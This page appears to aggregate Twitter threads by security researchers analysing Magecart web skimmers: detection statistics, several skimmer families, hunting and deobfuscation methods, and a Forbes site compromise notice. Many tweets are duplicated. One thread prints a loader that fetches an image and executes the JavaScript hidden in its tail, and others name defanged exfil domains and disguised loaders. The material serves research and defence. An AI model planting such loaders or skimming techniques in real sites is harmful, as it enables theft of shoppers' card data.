Discover and read the best of Twitter Threads about #magecart
Most recents (13)
While #infostealer detections trended downwards in 2022, decreasing by 10% in #ESET telemetry, #banking malware doubled in numbers YoY. #ESETresearch 1/4 
This phenomenon was caused by the prevalence of the web skimmer JS/Spy.Banker, also known as #Magecart. Throughout the year, it consistently accounted for about three-fourths of banking malware detections. It was also the third most detected infostealer overall in T3 2022. 2/4
Despite its prevalence, Magecart wasn’t the only banking malware to stand out this time: LATAM banking trojans had a strong end of the year; the detections of #Grandoreiro, #Casbaneiro, #Mekotio, and several others spiked significantly in T3. 3/4
Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.
Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.
1/30
Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.
1/30
Going to cover a fair amount of ground here:
- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter
And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.
2/30
- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter
And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.
2/30
Ok, first, here's some source code:
ManyQ Obfuscated: gist.github.com/krautface/ea24…
ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…
This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of this it:
3/30
ManyQ Obfuscated: gist.github.com/krautface/ea24…
ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…
This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of this it:
3/30
Thanks to data from @sansecio I think we've found the first digital skimmer/#magecart script to exfil using Telegram. In this thread, I'll go through the code, the drawbacks of this approach, and how to stop it dead (hint: CSP).
1/11
1/11
This of course isn't the first digital skimmer to abuse unrelated services to exfil its data. For example, back in June we saw the public disclosure of digital skimmers abusing Google Analytics: sansec.io/research/skimm…
2/x
2/x
A prettified version of the script is here: gist.github.com/krautface/c07a…
It's mostly unaltered, but I did redact one bit of information which I'll mention later.
3/x
It's mostly unaltered, but I did redact one bit of information which I'll mention later.
3/x
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.
1/9
1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…
2/9
gist.github.com/krautface/5a29…
2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…
It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.
3/9
It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.
3/9
Skimmers write actual spaghetti code... In an unexpected plot twist, card-stealing malware was disguised as Italian cuisine. #magecart #webskimmer 1/3
Normally criminals go out of their way to hide their work, but this pasta fan didn't seem to care. Also, the card collection server is pizdasniff[.]site, which is proper Russian for "pussyskimmer". 2/3
Despite its glaring presence, the skimmer has been injected in numerous sites since Dec 12th and most are still active. We have reached out to all affected merchants.
New digital skimmer/#magecart technique: steganography
A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.
1/5
A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.
1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.
hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg
2/5
hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg
2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}
3/5
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}
3/5
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)
First, what makes it unique?
1/17
First, what makes it unique?
1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL
Intrigued? Great. Let's go
2/x
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL
Intrigued? Great. Let's go
2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?
3/x
3/x
:: Magecart Hunting Thread ::
This is a thread about how to hunt and find #Magecart infected sites using @URLscan. 💰💵
♻️Please retweet to help spread knowledge and feel free to add your own techniques, ideas, and suggestions.
⚠️THREAD⚠️
This is a thread about how to hunt and find #Magecart infected sites using @URLscan. 💰💵
♻️Please retweet to help spread knowledge and feel free to add your own techniques, ideas, and suggestions.
⚠️THREAD⚠️
A brief overview of Magecart.
Magecart is an umbrella term for the technique of injecting JavaScript to steal credit card numbers on E-commerce sites. A number of actors/groups operate under the same term implanting JavaScript onto checkout pages all over the world.
Magecart is an umbrella term for the technique of injecting JavaScript to steal credit card numbers on E-commerce sites. A number of actors/groups operate under the same term implanting JavaScript onto checkout pages all over the world.
To get started we need a foothold.
I have a hunt running looking for a known Magecart hash.
This morning a new site hit the search, looking at the site I then used the filename as a pivot. The filename which is infected with Magecart is "jquery_noconflict.js"
I have a hunt running looking for a known Magecart hash.
This morning a new site hit the search, looking at the site I then used the filename as a pivot. The filename which is infected with Magecart is "jquery_noconflict.js"
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
3/x
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -
Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website: gist.github.com/krautface/e0f8…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
Lines 3-14 in the prettified version look like they're doing something. If you look at Line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag, it's just never used
Annoyed as hell with a certain company's abuse department, so let's examine one of these #magecart / digital skimming loader techniques. The goal here will be to figure out what script it's trying to load. A thread, or something 1/13
Here's a common technique from a group. They try to make it look like something for Google Analytics, but it's clearly not. So what is it doing?
gist.github.com/krautface/5228…
First, you'll notice some weird variable names: showArticle, textAside, openReader, firstDescription. 2/13
gist.github.com/krautface/5228…
First, you'll notice some weird variable names: showArticle, textAside, openReader, firstDescription. 2/13
There's no meaning behind them, they're pretty random and are frequently changed. Pay little attention to them.
Let's clean up the code a little bit and see what's actually going on here. 3/13
gist.github.com/krautface/4ea5…
Let's clean up the code a little bit and see what's actually going on here. 3/13
gist.github.com/krautface/4ea5…
⚠️ WARNING ⚠️
@Forbes Magazine subscription website (forbesmagazine.com) is infected with #magecart malware.
Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results: urlscan.io/result/8630561…
Deobfuscated code: pastebin.com/3AR7wQ70
@Forbes Magazine subscription website (forbesmagazine.com) is infected with #magecart malware.
Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results: urlscan.io/result/8630561…
Deobfuscated code: pastebin.com/3AR7wQ70
@Forbes @urlscanio forbesmagazine.com is back online and we've confirmed the malware has been removed.
If you made a purchase on the site while it was compromised, your credit card information was likely stolen.
If you made a purchase on the site while it was compromised, your credit card information was likely stolen.
@Forbes @urlscanio We've been receiving a lot of questions from reporters regarding this incident. Here's the timeline so far:
